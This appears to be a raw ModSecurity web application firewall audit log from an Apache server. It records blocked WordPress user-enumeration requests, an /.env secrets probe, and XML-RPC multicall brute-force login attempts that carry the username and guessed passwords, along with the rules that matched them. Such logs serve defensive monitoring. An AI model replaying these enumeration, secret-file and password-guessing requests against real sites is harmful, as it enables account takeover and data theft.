Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982a164f-Z-- --8e9de05d-A-- [25/May/2025:10:46:23 +0700] aDKSj3awJq5017Xs8D698wAAANg 103.236.140.4 47152 103.236.140.4 8181 --8e9de05d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.68.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.68.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e9de05d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e9de05d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748144783199948 3014 (- - -) Stopwatch2: 1748144783199948 3014; combined=1315, p1=483, p2=802, p3=0, p4=0, p5=30, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e9de05d-Z-- --64707930-A-- [25/May/2025:11:00:55 +0700] aDKV99erygsLmB9N_YRL_AAAAJY 103.236.140.4 47416 103.236.140.4 8181 --64707930-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.156.42.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.156.42.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --64707930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64707930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748145655379514 3172 (- - -) Stopwatch2: 1748145655379514 3172; combined=1450, p1=448, p2=955, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64707930-Z-- --190b6b6b-A-- [25/May/2025:11:01:37 +0700] aDKWIderygsLmB9N_YRL_wAAAIA 103.236.140.4 47436 103.236.140.4 8181 --190b6b6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --190b6b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --190b6b6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748145697952394 3117 (- - -) Stopwatch2: 1748145697952394 3117; combined=1392, p1=461, p2=901, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --190b6b6b-Z-- --7b4efe3c-A-- [25/May/2025:11:24:42 +0700] aDKbinP6UgzLD1l8HTrwRQAAAAE 103.236.140.4 53314 103.236.140.4 8181 --7b4efe3c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 116.118.104.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7b4efe3c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi#1234 --7b4efe3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b4efe3c-E-- --7b4efe3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 116.118.104.42 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748147082157661 5775 (- - -) Stopwatch2: 1748147082157661 5775; combined=4100, p1=506, p2=3426, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b4efe3c-Z-- --5aed8841-A-- [25/May/2025:11:29:16 +0700] aDKcnBEdxfhJOSxH8A_zRAAAAEk 103.236.140.4 57278 103.236.140.4 8181 --5aed8841-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 116.118.104.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5aed8841-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi4 --5aed8841-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aed8841-E-- --5aed8841-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 116.118.104.42 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748147356639999 7355 (- - -) Stopwatch2: 1748147356639999 7355; combined=5345, p1=711, p2=4459, p3=0, p4=0, p5=107, sr=124, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aed8841-Z-- --a929e50c-A-- [25/May/2025:12:23:06 +0700] aDKpOhEdxfhJOSxH8A_87QAAAFA 103.236.140.4 54826 103.236.140.4 8181 --a929e50c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.29.224.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.29.224.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a929e50c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a929e50c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748150586371070 3547 (- - -) Stopwatch2: 1748150586371070 3547; combined=1750, p1=512, p2=1201, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a929e50c-Z-- --dba0bc5d-A-- [25/May/2025:13:10:45 +0700] aDK0ZXP6UgzLD1l8HToMFQAAABU 103.236.140.4 33400 103.236.140.4 8181 --dba0bc5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.229.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.229.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dba0bc5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dba0bc5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748153445183337 2434 (- - -) Stopwatch2: 1748153445183337 2434; combined=1052, p1=354, p2=675, p3=0, p4=0, p5=23, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba0bc5d-Z-- --fa30e141-A-- [25/May/2025:13:38:41 +0700] aDK68REdxfhJOSxH8A8PmwAAAE4 103.236.140.4 48260 103.236.140.4 8181 --fa30e141-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.98.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.98.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa30e141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa30e141-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155121006684 2582 (- - -) Stopwatch2: 1748155121006684 2582; combined=1153, p1=375, p2=742, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa30e141-Z-- --696a8a6a-A-- [25/May/2025:13:38:46 +0700] aDK69nawJq5017Xs8D7s3QAAAMM 103.236.140.4 48320 103.236.140.4 8181 --696a8a6a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --696a8a6a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFaHmI15 --696a8a6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --696a8a6a-E-- --696a8a6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155126460291 6391 (- - -) Stopwatch2: 1748155126460291 6391; combined=4581, p1=540, p2=3866, p3=0, p4=0, p5=104, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --696a8a6a-Z-- --0e318359-A-- [25/May/2025:13:39:41 +0700] aDK7LderygsLmB9N_YRzMwAAAJE 103.236.140.4 48814 103.236.140.4 8181 --0e318359-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0e318359-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix-admin2023 --0e318359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e318359-E-- --0e318359-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155181169862 5909 (- - -) Stopwatch2: 1748155181169862 5909; combined=4188, p1=533, p2=3475, p3=0, p4=0, p5=108, sr=150, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e318359-Z-- --d91fbb7e-A-- [25/May/2025:13:44:30 +0700] aDK8ThEdxfhJOSxH8A8RewAAAEY 103.236.140.4 51314 103.236.140.4 8181 --d91fbb7e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d91fbb7e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantixweb@gmail.com --d91fbb7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d91fbb7e-E-- --d91fbb7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155470933767 5302 (- - -) Stopwatch2: 1748155470933767 5302; combined=4272, p1=466, p2=3612, p3=0, p4=0, p5=111, sr=85, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d91fbb7e-Z-- --0ddc6d4b-A-- [25/May/2025:13:45:06 +0700] aDK8cnP6UgzLD1l8HToSHgAAAAg 103.236.140.4 51638 103.236.140.4 8181 --0ddc6d4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Charset: utf-8 --0ddc6d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ddc6d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748155506503961 773 (- - -) Stopwatch2: 1748155506503961 773; combined=325, p1=287, p2=0, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ddc6d4b-Z-- --7562af44-A-- [25/May/2025:13:48:44 +0700] aDK9THP6UgzLD1l8HToS6gAAAAg 103.236.140.4 53606 103.236.140.4 8181 --7562af44-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7562af44-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi132 --7562af44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7562af44-E-- --7562af44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155724873817 5486 (- - -) Stopwatch2: 1748155724873817 5486; combined=4007, p1=471, p2=3362, p3=0, p4=0, p5=102, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7562af44-Z-- --9cb3be2d-A-- [25/May/2025:13:52:20 +0700] aDK-JHawJq5017Xs8D7wQwAAAMs 103.236.140.4 55528 103.236.140.4 8181 --9cb3be2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9cb3be2d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi-ladylike --9cb3be2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb3be2d-E-- --9cb3be2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155940799262 5635 (- - -) Stopwatch2: 1748155940799262 5635; combined=4032, p1=471, p2=3375, p3=0, p4=0, p5=110, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb3be2d-Z-- --36bc060b-A-- [25/May/2025:13:54:44 +0700] aDK-tBEdxfhJOSxH8A8U8AAAAFg 103.236.140.4 56846 103.236.140.4 8181 --36bc060b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --36bc060b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmizhihuikandian_fahmi --36bc060b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bc060b-E-- --36bc060b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156084363239 4546 (- - -) Stopwatch2: 1748156084363239 4546; combined=3702, p1=425, p2=3134, p3=0, p4=0, p5=84, sr=70, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bc060b-Z-- --baefa20f-A-- [25/May/2025:13:59:35 +0700] aDK_19erygsLmB9N_YR34gAAAII 103.236.140.4 59440 103.236.140.4 8181 --baefa20f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --baefa20f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmipassadminantix --baefa20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baefa20f-E-- --baefa20f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156375800834 5491 (- - -) Stopwatch2: 1748156375800834 5491; combined=4130, p1=474, p2=3478, p3=0, p4=0, p5=103, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
